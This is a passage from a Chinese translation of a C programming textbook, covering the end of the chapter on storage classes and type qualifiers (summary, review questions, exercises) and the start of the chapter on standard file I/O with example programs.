元素的指针,且该数组至少有20个元素。这种用法的目的是让编译器使用这 些信息优化函数的编码。为何给static新增一个完全不同的用法?C 标准委员 会不愿意创建新的关键字,因为这样会让以前用新关键字作为标识符的程序 932 无效。所以,他们会尽量利用现有的关键字,尽量不添加新的关键字。 restrict 关键字有两个读者。一个是编译器,该关键字告知编译器可以 自由假定一些优化方案。另一个读者是用户,该关键字告知用户要使用满足 restrict要求的参数。 933 12.6 关键概念 C 提供多种管理内存的模型。除了熟悉这些模型外,还要学会如何选择 不同的类别。大多数情况下,最好选择自动变量。如果要使用其他类别,应 该有充分的理由。通常,使用自动变量、函数形参和返回值进行函数间的通 信比使用全局变量安全。但是,保持不变的数据适合用全局变量。 应该尽量理解静态内存、自动内存和动态分配内存的属性。尤其要注 意:静态内存的数量在编译时确定;静态数据在载入程序时被载入内存。在 程序运行时,自动变量被分配或释放,所以自动变量占用的内存数量随着程 序的运行会不断变化。可以把自动内存看作是可重复利用的工作区。动态分 配的内存也会增加和减少,但是这个过程由函数调用控制,不是自动进行 的。 934 12.7 本章小结 内存用于存储程序中的数据,由存储期、作用域和链接表征。存储期可 以是静态的、自动的或动态分配的。如果是静态存储期,在程序开始执行时 分配内存,并在程序运行时都存在。如果是自动存储期,在程序进入变量定 义所在块时分配变量的内存,在程序离开块时释放内存。如果是动态分配存 储期,在调用malloc()(或相关函数)时分配内存,在调用free()函数时释放 内存。 作用域决定程序的哪些部分可以访问某数据。定义在所有函数之外的变 量具有文件作用域,对位于该变量声明之后的所有函数可见。定义在块或作 为函数形参内的变量具有块作用域,只对该块以及它包含的嵌套块可见。 链接描述定义在程序某翻译单元中的变量可被链接的程度。具有块作用 域的变量是局部变量,无链接。具有文件作用域的变量可以是内部链接或外 部链接。内部链接意味着只有其定义所在的文件才能使用该变量。外部链接 意味着其他文件使用也可以使用该变量。 下面是C的5种存储类别(不包括线程的概念)。 自动——在块中不带存储类别说明符或带 auto 存储类别说明符声明的 变量(或作为函数头中的形参)属于自动存储类别,具有自动存储期、块作 用域、无链接。如果未初始化自动变量,它的值是未定义的。 寄存器——在块中带 register 存储类别说明符声明的变量(或作为函数 头中的形参)属于寄存器存储类别,具有自动存储期、块作用域、无链接, 且无法获取其地址。把一个变量声明为寄存器变量即请求编译器将其储存到 访问速度最快的区域。如果未初始化寄存器变量,它的值是未定义的。 静态、无链接——在块中带static存储类别说明符声明的变量属于“静 态、无链接”存储类别,具有静态存储期、块作用域、无链接。只在编译时 被初始化一次。如果未显式初始化,它的字节都被设置为0。 935 静态、外部链接——在所有函数外部且没有使用 static 存储类别说明符 声明的变量属于“静态、外部链接”存储类别,具有静态存储期、文件作用 域、外部链接。只能在编译器被初始化一次。如果未显式初始化,它的字节 都被设置为0。 静态、内部链接——在所有函数外部且使用了 static 存储类别说明符声 明的变量属于“静态、内部链接”存储类别,具有静态存储期、文件作用域、 内部链接。只能在编译器被初始化一次。如果未显式初始化,它的字节都被 设置为0。 动态分配的内存由 malloc()(或相关)函数分配,该函数返回一个指向 指定字节数内存块的指针。这块内存被free()函数释放后便可重复使用, free()函数以该内存块的地址作为参数。 类型限定符const、volatile、restrict和_Atomic。const限定符限定数据在 程序运行时不能改变。对指针使用const时,可限定指针本身不能改变或指 针指向的数据不能改变,这取决于const在指针声明中的位置。volatile 限定 符表明,限定的数据除了被当前程序修改外还可以被其他进程修改。该限定 符的目的是警告编译器不要进行假定的优化。restrict限定符也是为了方便编 译器设置优化方案。restrict限定的指针是访问它所指向数据的唯一途径。 936 12.8 复习题 复习题的参考答案在附录A中。 1.哪些类别的变量可以成为它所在函数的局部变量? 
2.哪些类别的变量在它所在程序的运行期一直存在? 3.哪些类别的变量可以被多个文件使用?哪些类别的变量仅限于在一个 文件中使用? 4.块作用域变量具有什么链接属性? 5.extern关键字有什么用途? 6.考虑下面两行代码,就输出的结果而言有何异同: int * p1 = (int *)malloc(100 * sizeof(int)); int * p1 = (int *)calloc(100, sizeof(int)); 7.下面的变量对哪些函数可见?程序是否有误? /* 文件 1 */ int daisy; int main(void) { int lily; ...; } 937 int petal() { extern int daisy, lily; ...; } /* 文件 2 */ extern int daisy; static int lily; int rose; int stem() { int rose; ...; } void root() { ...; } 8.下面程序会打印什么? 938 #include <stdio.h> char color = 'B'; void first(void); void second(void); int main(void) { extern char color; printf("color in main() is %c\n", color); first(); printf("color in main() is %c\n", color); second(); printf("color in main() is %c\n", color); return 0; } void first(void) { char color; color = 'R'; printf("color in first() is %c\n", color); 939 } void second(void) { color = 'G'; printf("color in second() is %c\n", color); } 9.假设文件的开始处有如下声明: static int plink; int value_ct(const int arr[], int value, int n); a.以上声明表明了程序员的什么意图? b.用const int value和const int n分别替换int value和int n,是否对主调程序 的值加强保护。 940 12.9 编程练习 1.不使用全局变量,重写程序清单12.4。 2.在美国,通常以英里/加仑来计算油耗;在欧洲,以升/100 公里来计 算。下面是程序的一部分,提示用户选择计算模式(美制或公制),然后接 收数据并计算油耗。 // pe12-2b.c // 与 pe12-2a.c 一起编译 #include <stdio.h> #include "pe12-2a.h" int main(void) { int mode; printf("Enter 0 for metric mode, 1 for US mode: "); scanf("%d", &mode); while (mode >= 0) { set_mode(mode); get_info(); show_info(); 941 printf("Enter 0 for metric mode, 1 for US mode"); printf(" (-1 to quit): "); scanf("%d", &mode); } printf("Done.\n"); return 0; } 下面是是一些输出示例: Enter 0 for metric mode, 1 for US mode: 0 Enter distance traveled in kilometers: 600 Enter fuel consumed in liters: 78.8 Fuel consumption is 13.13 liters per 100 km. Enter 0 for metric mode, 1 for US mode (-1 to quit): 1 Enter distance traveled in miles: 434 Enter fuel consumed in gallons: 12.7 Fuel consumption is 34.2 miles per gallon. Enter 0 for metric mode, 1 for US mode (-1 to quit): 3 Invalid mode specified. Mode 1(US) used. Enter distance traveled in miles: 388 942 Enter fuel consumed in gallons: 15.3 Fuel consumption is 25.4 miles per gallon. Enter 0 for metric mode, 1 for US mode (-1 to quit): -1 Done. 如果用户输入了不正确的模式,程序向用户给出提示消息并使用上一次 输入的正确模式。请提供pe12-2a.h头文件和pe12-2a.c源文件。源代码文件应 定义3个具有文件作用域、内部链接的变量。一个表示模式、一个表示距 离、一个表示消耗的燃料。get_info()函数根据用户输入的模式提示用户输入 相应数据,并将其储存到文件作用域变量中。show_info()函数根据设置的模 式计算并显示油耗。可以假设用户输入的都是数值数据。 3.重新设计编程练习2,要求只使用自动变量。该程序提供的用户界面 不变,即提示用户输入模式等。但是,函数调用要作相应变化。 4.在一个循环中编写并测试一个函数,该函数返回它被调用的次数。 5.编写一个程序,生成100个1~10范围内的随机数,并以降序排列(可 以把第11章的排序算法稍加改动,便可用于整数排序,这里仅对整数排 序)。 6.编写一个程序,生成1000个1~10范围内的随机数。不用保存或打印 这些数字,仅打印每个数出现的次数。用 10 个不同的种子值运行,生成的 数字出现的次数是否相同?可以使用本章自定义的函数或ANSI C的rand()和 srand()函数,它们的格式相同。这是一个测试特定随机数生成器随机性的方 法。 7.编写一个程序,按照程序清单12.13输出示例后面讨论的内容,修改该 程序。使其输出类似: Enter the number of sets; enter q to stop : 18 943 How many sides and how many dice? 6 3 Here are 18 sets of 3 6-sided throws. 12 10 6 9 8 14 8 15 9 14 12 17 11 7 10 13 8 14 How many sets? 
Enter q to stop: q 8.下面是程序的一部分: // pe12-8.c #include <stdio.h> int * make_array(int elem, int val); void show_array(const int ar [], int n); int main(void) { int * pa; int size; int value; printf("Enter the number of elements: "); while (scanf("%d", &size) == 1 && size > 0) { printf("Enter the initialization value: "); 944 scanf("%d", &value); pa = make_array(size, value); if (pa) { show_array(pa, size); free(pa); } printf("Enter the number of elements (<1 to quit): "); } printf("Done.\n"); return 0; } 提供make_array()和show_array()函数的定义,完成该程序。make_array() 函数接受两个参数,第1个参数是int类型数组的元素个数,第2个参数是要赋 给每个元素的值。该函数调用malloc()创建一个大小合适的数组,将其每个 元素设置为指定的值,并返回一个指向该数组的指针。show_array()函数显 示数组的内容,一行显示8个数。 9.编写一个符合以下描述的函数。首先,询问用户需要输入多少个单 词。然后,接收用户输入的单词,并显示出来,使用malloc()并回答第1个问 题(即要输入多少个单词),创建一个动态数组,该数组内含相应的指向 char的指针(注意,由于数组的每个元素都是指向char的指针,所以用于储 存malloc()返回值的指针应该是一个指向指针的指针,且它所指向的指针指 945 向char)。在读取字符串时,该程序应该把单词读入一个临时的char数组, 使用malloc()分配足够的存储空间来储存单词,并把地址存入该指针数组 (该数组中每个元素都是指向 char 的指针)。然后,从临时数组中把单词 拷贝到动态分配的存储空间中。因此,有一个字符指针数组,每个指针都指 向一个对象,该对象的大小正好能容纳被储存的特定单词。下面是该程序的 一个运行示例: How many words do you wish to enter? 5 Enter 5 words now: I enjoyed doing this exerise Here are your words: I enjoyed doing this exercise [1].注意,以static声明的文件作用域变量具有内部链接属性。——译者注 946 第13章 文件输入/输出 本章介绍以下内容: 函数:fopen()、getc()、putc()、exit()、fclose() fprintf()、fscanf()、fgets()、fputs() rewind()、fseek()、ftell()、fflush() fgetpos()、fsetpos()、feof()、ferror() ungetc()、setvbuf()、fread()、fwrite() 如何使用C标准I/O系列的函数处理文件 文件模式和二进制模式、文本和二进制格式、缓冲和无缓冲I/O 使用既可以顺序访问文件也可以随机访问文件的函数 文件是当今计算机系统不可或缺的部分。文件用于储存程序、文档、数 据、书信、表格、图形、照片、视频和许多其他种类的信息。作为程序员, 必须会编写创建文件和从文件读写数据的程序。本章将介绍相关的内容。 947 13.1 与文件进行通信 有时,需要程序从文件中读取信息或把信息写入文件。这种程序与文件 交互的形式就是文件重定向(第8章介绍过)。这种方法很简单,但是有一 定限制。例如,假设要编写一个交互程序,询问用户书名并把完整的书名列 表保存在文件中。如果使用重定向,应该类似于: books > bklist 用户的输入被重定向到 bklist 中。这样做不仅会把不符合要求的文本写 入 bklist,而且用户也看不到要回答什么问题。 C提供了更强大的文件通信方法,可以在程序中打开文件,然后使用特 殊的I/O函数读取文件中的信息或把信息写入文件。在研究这些方法之前, 先简要介绍一下文件的性质。 13.1.1 文件是什么 文件(file)通常是在磁盘或固态硬盘上的一段已命名的存储区。对我 们而言,stdio.h就是一个文件的名称,该文件中包含一些有用的信息。然 而,对操作系统而言,文件更复杂一些。例如,大型文件会被分开储存,或 者包含一些额外的数据,方便操作系统确定文件的种类。然而,这都是操作 系统所关心的,程序员关心的是C程序如何处理文件(除非你正在编写操作 系统)。 C把文件看作是一系列连续的字节,每个字节都能被单独读取。这与 UNIX环境中(C的发源地)的文件结构相对应。由于其他环境中可能无法完 全对应这个模型,C提供两种文件模式:文本模式和二进制模式。 13.1.2 文本模式和二进制模式 首先,要区分文本内容和二进制内容、文本文件格式和二进制文件格 式,以及文件的文本模式和二进制模式。 948 所有文件的内容都以二进制形式(0或1)储存。但是,如果文件最初使 用二进制编码的字符(例如, ASCII或Unicode)表示文本(就像C字符串那 样),该文件就是文本文件,其中包含文本内容。如果文件中的二进制值代 表机器语言代码或数值数据(使用相同的内部表示,假设,用于long或 double类型的值)或图片或音乐编码,该文件就是二进制文件,其中包含二 进制内容。 UNIX用同一种文件格式处理文本文件和二进制文件的内容。不奇怪, 鉴于C是作为开发UNIX的工具而创建的,C和UNIX在文本中都使用\n(换行 符)表示换行。UNIX目录中有一个统计文件大小的计数,程序可使用该计 数确定是否读到文件结尾。然而,其他系统在此之前已经有其他方法处理文 件,专门用于保存文本。也就是说,其他系统已经有一种与UNIX模型不同 的格式处理文本文件。例如,以前的OS X Macintosh文件用\r (回车符)表 示新的一行。早期的MS-DOS文件用\r\n组合表示新的一行,用嵌入的Ctrl+Z 字符表示文件结尾,即使实际文件用添加空字符的方法使其总大小是256的 倍数(在Windows中,Notepad仍然生成MS-DOS格式的文本文件,但是新的 编辑器可能使用类UNIX格式居多)。其他系统可能保持文本文件中的每一 行长度相同,如有必要,用空字符填充每一行,使其长度保持一致。或者, 系统可能在每行的开始标出每行的长度。 为了规范文本文件的处理,C 提供两种访问文件的途径:二进制模式和 文本模式。在二进制模式中,程序可以访问文件的每个字节。而在文本模式 中,程序所见的内容和文件的实际内容不同。程序以文本模式读取文件时, 把本地环境表示的行末尾或文件结尾映射为C模式。例如,C程序在旧式 Macintosh中以文本模式读取文件时,把文件中的\r转换成\n;以文本模式写 入文件时,把\n转换成\r。或者,C文本模式程序在MS-DOS平台读取文件 时,把\r\n转换成\n;写入文件时,把\n转换成\r\n。在其他环境中编写的文本 模式程序也会做类似的转换。 除了以文本模式读写文本文件,还能以二进制模式读写文本文件。如果 读写一个旧式MS-DOS文本文件,程序会看到文件中的\r 和\n 字符,不会发 生映射(图 13.1 演示了一些文本)。如果要编写旧式 Mac格式、MS-DOS格 949 式或UNIX/Linux格式的文件模式程序,应该使用二进制模式,这样程序才能 确定实际的文件内容并执行相应的动作。 图13.1 二进制模式和文本模式 虽然C提供了二进制模式和文本模式,但是这两种模式的实现可以相 同。前面提到过,因为UNIX使用一种文件格式,这两种模式对于UNIX实现 而言完全相同。Linux也是如此。 13.1.3 I/O的级别 除了选择文件的模式,大多数情况下,还可以选择I/O的两个级别(即 处理文件访问的两个级别)。底层I/O(low-level I/O)使用操作系统提供的 
基本I/O服务。标准高级I/O(standard high-level I/O)使用C库的标准包和 stdio.h头文件定义。因为无法保证所有的操作系统都使用相同的底层I/O模 950 型,C标准只支持标准I/O包。有些实现会提供底层库,但是C标准建立了可 移植的I/O模型,我们主要讨论这些I/O。 13.1.4 标准文件 C程序会自动打开3个文件,它们被称为标准输入(standard input)、标 准输出(standard output)和标准错误输出(standard error output)。在默认 情况下,标准输入是系统的普通输入设备,通常为键盘;标准输出和标准错 误输出是系统的普通输出设备,通常为显示屏。 通常,标准输入为程序提供输入,它是 getchar()和 scanf()使用的文件。 程序通常输出到标准输出,它是putchar()、puts()和printf()使用的文件。第8 章提到的重定向把其他文件视为标准输入或标准输出。标准错误输出提供了 一个逻辑上不同的地方来发送错误消息。例如,如果使用重定向把输出发送 给文件而不是屏幕,那么发送至标准错误输出的内容仍然会被发送到屏幕 上。这样很好,因为如果把错误消息发送至文件,就只能打开文件才能看 到。 951 13.2 标准I/O 与底层I/O相比,标准I/O包除了可移植以外还有两个好处。第一,标准 I/O有许多专门的函数简化了处理不同I/O的问题。例如,printf()把不同形式 的数据转换成与终端相适应的字符串输出。第二,输入和输出都是缓冲的。 也就是说,一次转移一大块信息而不是一字节信息(通常至少512字节)。 例如,当程序读取文件时,一块数据被拷贝到缓冲区(一块中介存储区 域)。这种缓冲极大地提高了数据传输速率。程序可以检查缓冲区中的字 节。缓冲在后台处理,所以让人有逐字符访问的错觉(如果使用底层I/O, 要自己完成大部分工作)。程序清单13.1演示了如何用标准I/O读取文件和 统计文件中的字符数。我们将在后面几节讨论程序清单 13.1 中的一些特 性。该程序使用命令行参数,如果你是Windows用户,在编译后必须在命令 提示窗口运行该程序;如果你是Macintosh用户,最简单的方法是使用 Terminal在命令行形式中编译并运行该程序。或者,如第11章所述,如果在 IDE中运行该程序,可以使用Xcode的Product菜单提供命令行参数。或者也 可以用puts()和fgets()函数替换命令行参数来获得文件名。 程序清单13.1 count.c程序 /* count.c -- 使用标准 I/O */ #include <stdio.h> #include <stdlib.h>  // 提供 exit()的原型 int main(int argc, char *argv []) { int ch;      // 读取文件时,储存每个字符的地方 FILE *fp;   // “文件指针” unsigned long count = 0; 952 if (argc != 2) { printf("Usage: %s filename\n", argv[0]); exit(EXIT_FAILURE); } if ((fp = fopen(argv[1], "r")) == NULL) { printf("Can't open %s\n", argv[1]); exit(EXIT_FAILURE); } while ((ch = getc(fp)) != EOF) { putc(ch, stdout); // 与 putchar(ch); 相同 count++; } fclose(fp); printf("File %s has %lu characters\n", argv[1], count); return 0; } 953 13.2.1 检查命令行参数 首先,程序清单13.1中的程序检查argc的值,查看是否有命令行参数。 如果没有,程序将打印一条消息并退出程序。字符串 argv[0]是该程序的名 称。显式使用 argv[0]而不是程序名,错误消息的描述会随可执行文件名的 改变而自动改变。这一特性在像 UNIX 这种允许单个文件具有多个文件名的 环境中也很方便。但是,一些操作系统可能不识别argv[0],所以这种用法并 非完全可移植。 exit()函数关闭所有打开的文件并结束程序。exit()的参数被传递给一些 操作系统,包括 UNIX、Linux、Windows和MS-DOS,以供其他程序使用。 通常的惯例是:正常结束的程序传递0,异常结束的程序传递非零值。不同 的退出值可用于区分程序失败的不同原因,这也是UNIX和DOS编程的通常 做法。但是,并不是所有的操作系统都能识别相同范围内的返回值。因此, C 标准规定了一个最小的限制范围。尤其是,标准要求0或宏 EXIT_SUCCESS用于表明成功结束程序,宏EXIT_FAILURE用于表明结束程 序失败。这些宏和exit()原型都位于stdlib.h头文件中。 根据ANSI C的规定,在最初调用的main()中使用return与调用exit()的效 果相同。因此,在main(),下面的语句: return 0; 和下面这条语句的作用相同: exit(0); 但是要注意,我们说的是“最初的调用”。如果main()在一个递归程序 中,exit()仍然会终止程序,但是return只会把控制权交给上一级递归,直至 最初的一级。然后return结束程序。return和exit()的另一个区别是,即使在其 他函数中(除main()以外)调用exit()也能结束整个程序。 13.2.2 fopen()函数 954 继续分析程序清单13.1,该程序使用fopen()函数打开文件。该函数声明 在stdio.h中。它的第1个参数是待打开文件的名称,更确切地说是一个包含 改文件名的字符串地址。第 2 个参数是一个字符串,指定待打开文件的模 式。表13.1列出了C库提供的一些模式。 表13.1 fopen()的模式字符串 像UNIX和Linux这样只有一种文件类型的系统,带b字母的模式和不带b 字母的模式相同。 新的C11新增了带x字母的写模式,与以前的写模式相比具有更多特 性。第一,如果以传统的一种写模式打开一个现有文件,fopen()会把该文件 的长度截为 0,这样就丢失了该文件的内容。但是使用带 x字母的写模式, 即使fopen()操作失败,原文件的内容也不会被删除。第二,如果环境允许, x模式的独占特性使得其他程序或线程无法访问正在被打开的文件。 警告 如果使用任何一种"w"模式(不带x字母)打开一个现有文件,该文件的 内容会被删除,以便程序在一个空白文件中开始操作。然而,如果使用带x 字母的任何一种模式,将无法打开一个现有文件。 程序成功打开文件后,fopen()将返回文件指针(file pointer),其他I/O 955 函数可以使用这个指针指定该文件。文件指针(该例中是fp)的类型是指向 FILE的指针,FILE是一个定义在stdio.h中的派生类型。文件指针fp并不指向 实际的文件,它指向一个包含文件信息的数据对象,其中包含操作文件的 I/O函数所用的缓冲区信息。因为标准库中的I/O函数使用缓冲区,所以它们 不仅要知道缓冲区的位置,还要知道缓冲区被填充的程度以及操作哪一个文 件。标准I/O函数根据这些信息在必要时决定再次填充或清空缓冲区。fp指 向的数据对象包含了这些信息(该数据对象是一个 C结构,将在第 14章中 介绍)。 13.2.3 getc()和putc()函数 getc()和putc()函数与getchar()和putchar()函数类似。所不同的是,要告诉 getc()和putc()函数使用哪一个文件。下面这条语句的意思是“从标准输入中 获取一个字符”: ch = getchar(); 然而,下面这条语句的意思是“从fp指定的文件中获取一个字符”: ch = getc(fp); 与此类似,下面语句的意思是“把字符ch放入FILE指针fpout指定的文件 中”: putc(ch, fpout); 在putc()函数的参数列表中,第1个参数是待写入的字符,第2个参数是 文件指针。 程序清单13.1把stdout作为putc()的第2个参数。stdout作为与标准输出相 关联的文件指针,定义在stdio.h中,所以putc(ch, 
stdout)与putchar(ch)的作用 相同。实际上,putchar()函数一般通过putc()来定义。与此类似,getchar()也 通过使用标准输入的getc()来定义。 956 为何该示例不用 putchar()而要用 putc()?原因之一是为了介绍 putc()函 数;原因之二是,把stdout替换成别的参数,很容易将这段程序改写成文件 输出。 13.2.4 文件结尾 从文件中读取数据的程序在读到文件结尾时要停止。如何告诉程序已经 读到文件结尾?如果 getc()函数在读取一个字符时发现是文件结尾,它将返 回一个特殊值EOF。所以C程序只有在读到超过文件末尾时才会发现文件的 结尾(一些其他语言用一个特殊的函数在读取之前测试文件结尾,C语言不 同)。 为了避免读到空文件,应该使用入口条件循环(不是do while循环)进 行文件输入。鉴于getc() (和其他C输入函数)的设计,程序应该在进入循 环体之前先尝试读取。如下面设计所示: // 设计范例 #1 int ch;      // 用int类型的变量储存EOF FILE * fp; fp = fopen("wacky.txt", "r"); ch = getc(fp);     // 获取初始输入 while (ch != EOF) { putchar(ch); // 处理输入 ch = getc(fp);  // 获取下一个输入 } 957 以上代码可简化为: // 设计范例 #2 int ch; FILE * fp; fp = fopen("wacky.txt", "r"); while (( ch = getc(fp)) != EOF) { putchar(ch); //处理输入 } 由于ch = getc(fp)是while测试条件的一部分,所以程序在进入循环体之 前就读取了文件。不要设计成下面这样: // 糟糕的设计(存在两个问题) int ch; FILE * fp; fp = fopen("wacky.txt", "r"); while (ch != EOF) // 首次使用ch时,它的值尚未确定 { ch = getc(fp);  // 获取输入 putchar(ch);    // 处理输入 958 } 第1个问题是,ch首次与EOF比较时,其值尚未确定。第2个问题是,如 果getc()返回EOF,该循环会把EOF作为一个有效字符处理。这些问题都可以 解决。例如,把ch初始化为一个哑值(dummy value),再把一个if语句加入 到循环中。但是,何必多此一举,直接使用上面的设计范例即可。 其他输入函数也会用到这种处理方案,它们在读到文件结尾时也会返回 一个错误信号(EOF 或 NULL指针)。 13.2.5 fclose()函数 fclose(fp)函数关闭fp指定的文件,必要时刷新缓冲区。对于较正式的程 序,应该检查是否成功关闭文件。如果成功关闭,fclose()函数返回0,否则 返回EOF: if (fclose(fp) != 0) printf("Error in closing file %s\n", argv[1]); 如果磁盘已满、移动硬盘被移除或出现I/O错误,都会导致调用fclose() 函数失败。 13.2.6 指向标准文件的指针 stdio.h头文件把3个文件指针与3个标准文件相关联,C程序会自动打开 这3个标准文件。如表13.2所示: 表13.2 标准文件和相关联的文件指针 这些文件指针都是指向FILE的指针,所以它们可用作标准I/O函数的参 959 数,如fclose(fp)中的fp。接下来,我们用一个程序示例创建一个新文件,并 写入内容。 960 13.3 一个简单的文件压缩程序 下面的程序示例把一个文件中选定的数据拷贝到另一个文件中。该程序 同时打开了两个文件,以"r"模式打开一个,以"w"模式打开另一个。该程序 (程序清单13.2)以保留每3个字符中的第1个字符的方式压缩第1个文件的 内容。最后,把压缩后的文本存入第2个文件。第2个文件的名称是第1个文 件名加上.red后缀(此处的red代表reduced)。使用命令行参数,同时打开多 个文件,以及在原文件名后面加上后缀,都是相当有用的技巧。这种压缩方 式有限,但是也有它的用途(很容易把该程序改成用标准 I/O 而不是命令行 参数提供文件名)。 程序清单13.2 reducto.c程序 // reducto.c –把文件压缩成原来的1/3! #include <stdio.h> #include <stdlib.h>  // 提供 exit()的原型 #include <string.h>  // 提供 strcpy()、strcat()的原型 #define LEN 40 int main(int argc, char *argv []) { FILE *in, *out;  // 声明两个指向 FILE 的指针 int ch; char name[LEN];  // 储存输出文件名 int count = 0; 961 // 检查命令行参数 if (argc < 2) { fprintf(stderr, "Usage: %s filename\n", argv[0]); exit(EXIT_FAILURE); } // 设置输入 if ((in = fopen(argv[1], "r")) == NULL) { fprintf(stderr, "I couldn't open the file \"%s\"\n", argv[1]); exit(EXIT_FAILURE); } // 设置输出 strncpy(name, argv[1], LEN - 5);  // 拷贝文件名 name[LEN - 5] = '\0'; strcat(name, ".red");        // 在文件名后添加.red if ((out = fopen(name, "w")) == NULL) {          // 以写模式打开文件 962 fprintf(stderr, "Can't create output file.\n"); exit(3); } // 拷贝数据 while ((ch = getc(in)) != EOF) if (count++ % 3 == 0) putc(ch, out);// 打印3个字符中的第1个字符 // 收尾工作 if (fclose(in) != 0 || fclose(out) != 0) fprintf(stderr, "Error in closing files\n"); return 0; } 假设可执行文件名是reducto,待读取的文件名为eddy,该文件中包含下 面一行内容: So even Eddy came oven ready. 命令如下: reducto eddy 待写入的文件名为eddy.red。该程序把输出显示在eddy.red中,而不是屏 幕上。打开eddy.red,内容如下: Send money 963 该程序示例演示了几个编程技巧。我们来仔细研究一下。 fprintf()和 printf()类似,但是 fprintf()的第 1 个参数必须是一个文件指 针。程序中使用stderr指针把错误消息发送至标准错误,C标准通常都这么 做。 为了构造新的输出文件名,该程序使用strncpy()把名称eddy拷贝到数组 name中。参数LEN-5为.red后缀和末尾的空字符预留了空间。如果argv[2]字 符串比LEN-5长,就拷贝不了空字符。出现这种情况时,程序会添加空字 符。调用strncpy()后,name中的第1个空字符在调用strcat()函数时,被.red的. 
覆盖,生成了eddy.red。程序中还检查了是否成功打开名为eddy.red的文件。 这个步骤在一些环境中相当重要,因为像strange.c.red这样的文件名可能是 无效的。例如,在传统的DOS环境中,不能在后缀名后面添加后缀名(MS- DOS使用的方法是用.red替换现有后缀名,所以strange.c将变成strange.red。 例如,可以用strchr()函数定位(如果有的话),然后只拷贝点前面的部分即 可)。 该程序同时打开了两个文件,所以我们要声明两个 FIFL 指针。注意, 程序都是单独打开和关闭每个文件。同时打开的文件数量是有限的,这个限 制取决于系统和实现,范围一般是10~20。相同的文件指针可以处理不同的 文件,前提是这些文件不需要同时打开。 964 13.4 文件I/O:fprintf()、fscanf()、fgets()和fputs() 前面章节介绍的I/O函数都类似于文件I/O函数。它们的主要区别是,文 件I/O函数要用FILE指针指定待处理的文件。与 getc()、putc()类似,这些函 数都要求用指向 FILE 的指针(如,stdout)指定一个文件,或者使用fopen() 的返回值。 13.4.1 fprintf()和fscanf()函数 文件I/O函数fprintf()和fscanf()函数的工作方式与printf()和scanf()类似, 区别在于前者需要用第1个参数指定待处理的文件。我们在前面用过 fprintf()。程序清单13.3演示了这两个文件I/O函数和rewind()函数的用法。 程序清单13.3 addaword.c程序 /* addaword.c -- 使用 fprintf()、fscanf() 和 rewind() */ #include <stdio.h> #include <stdlib.h> #include <string.h> #define MAX 41 int main(void) { FILE *fp; char words[MAX]; if ((fp = fopen("wordy", "a+")) == NULL) 965 { fprintf(stdout, "Can't open \"wordy\" file.\n"); exit(EXIT_FAILURE); } puts("Enter words to add to the file; press the #"); puts("key at the beginning of a line to terminate."); while ((fscanf(stdin, "%40s", words) == 1) && (words[0] != '#')) fprintf(fp, "%s\n", words); puts("File contents:"); rewind(fp);    /* 返回到文件开始处 */ while (fscanf(fp, "%s", words) == 1) puts(words); puts("Done!"); if (fclose(fp) != 0) fprintf(stderr, "Error closing file\n"); return 0; } 该程序可以在文件中添加单词。使用"a+"模式,程序可以对文件进行读 写操作。首次使用该程序,它将创建wordy文件,以便把单词存入其中。随 后再使用该程序,可以在wordy文件后面添加单词。虽然"a+"模式只允许在 966 文件末尾添加内容,但是该模式下可以读整个文件。rewind()函数让程序回 到文件开始处,方便while循环打印整个文件的内容。注意,rewind()接受一 个文件指针作为参数。 下面是该程序在UNIX环境中的一个运行示例(可执行程序已重命名为 addword): $ addaword Enter words to add to the file; press the Enter key at the beginning of a line to terminate. The fabulous programmer # File contents: The fabulous programmer Done! $ addaword Enter words to add to the file; press the Enter key at the beginning of a line to terminate. enchanted the large 967 # File contents: The fabulous programmer enchanted the large Done! 
如你所见,fprintf()和 fscanf()的工作方式与 printf()和 scanf()类似。但 是,与 putc()不同的是,fprintf()和fscanf()函数都把FILE指针作为第1个参 数,而不是最后一个参数。 13.4.2 fgets()和fputs()函数 第11章时介绍过fgets()函数。它的第1个参数和gets()函数一样,也是表 示储存输入位置的地址(char * 类型);第2个参数是一个整数,表示待输 入字符串的大小 [1];最后一个参数是文件指针,指定待读取的文件。下面 是一个调用该函数的例子: fgets(buf, STLEN, fp); 这里,buf是char类型数组的名称,STLEN是字符串的大小,fp是指向 FILE的指针。 fgets()函数读取输入直到第 1 个换行符的后面,或读到文件结尾,或者 读取STLEN-1 个字符(以上面的 fgets()为例)。然后,fgets()在末尾添加一 968 个空字符使之成为一个字符串。字符串的大小是其字符数加上一个空字符。 如果fgets()在读到字符上限之前已读完一整行,它会把表示行结尾的换行符 放在空字符前面。fgets()函数在遇到EOF时将返回NULL值,可以利用这一机 制检查是否到达文件结尾;如果未遇到EOF则之前返回传给它的地址。 fputs()函数接受两个参数:第1个是字符串的地址;第2个是文件指针。 该函数根据传入地址找到的字符串写入指定的文件中。和 puts()函数不同, fputs()在打印字符串时不会在其末尾添加换行符。下面是一个调用该函数的 例子: fputs(buf, fp); 这里,buf是字符串的地址,fp用于指定目标文件。 由于fgets()保留了换行符,fputs()就不会再添加换行符,它们配合得非 常好。如第11章的程序清单11.8所示,即使输入行比STLEN长,这两个函数 依然处理得很好。 969 13.5 随机访问:fseek()和ftell() 有了 fseek()函数,便可把文件看作是数组,在 fopen()打开的文件中直 接移动到任意字节处。我们创建一个程序(程序清单13.4)演示fseek()和 ftell()的用法。注意,fseek()有3个参数,返回int类型的值;ftell()函数返回一 个long类型的值,表示文件中的当前位置。 程序清单13.4 reverse.c程序 /* reverse.c -- 倒序显示文件的内容 */ #include <stdio.h> #include <stdlib.h> #define CNTL_Z '\032'   /* DOS文本文件中的文件结尾标记 */ #define SLEN 81 int main(void) { char file[SLEN]; char ch; FILE *fp; long count, last; puts("Enter the name of the file to be processed:"); scanf("%80s", file); if ((fp = fopen(file, "rb")) == NULL) 970 {                  /* 只读模式  */ printf("reverse can't open %s\n", file); exit(EXIT_FAILURE); } fseek(fp, 0L, SEEK_END);       /* 定位到文件末尾 */ last = ftell(fp); for (count = 1L; count <= last; count++) { fseek(fp, -count, SEEK_END);    /* 回退   */ ch = getc(fp); if (ch != CNTL_Z && ch != '\r') /* MS-DOS 文件 */ putchar(ch); } putchar('\n'); fclose(fp); return 0; } 下面是对一个文件的输出: Enter the name of the file to be processed: 971 Cluv .C ni eno naht ylevol erom margorp a ees reven llahs I taht kniht I 该程序使用二进制模式,以便处理MS-DOS文本和UNIX文件。但是, 在使用其他格式文本文件的环境中可能无法正常工作。 注意 如果通过命令行环境运行该程序,待处理文件要和可执行文件在同一个 目录(或文件夹)中。如果在IDE中运行该程序,具体查找方案序因实现而 异。例如,默认情况下,Microsoft Visual Studio 2012在源代码所在的目录中 查找,而Xcode 4.6则在可执行文件所在的目录中查找。 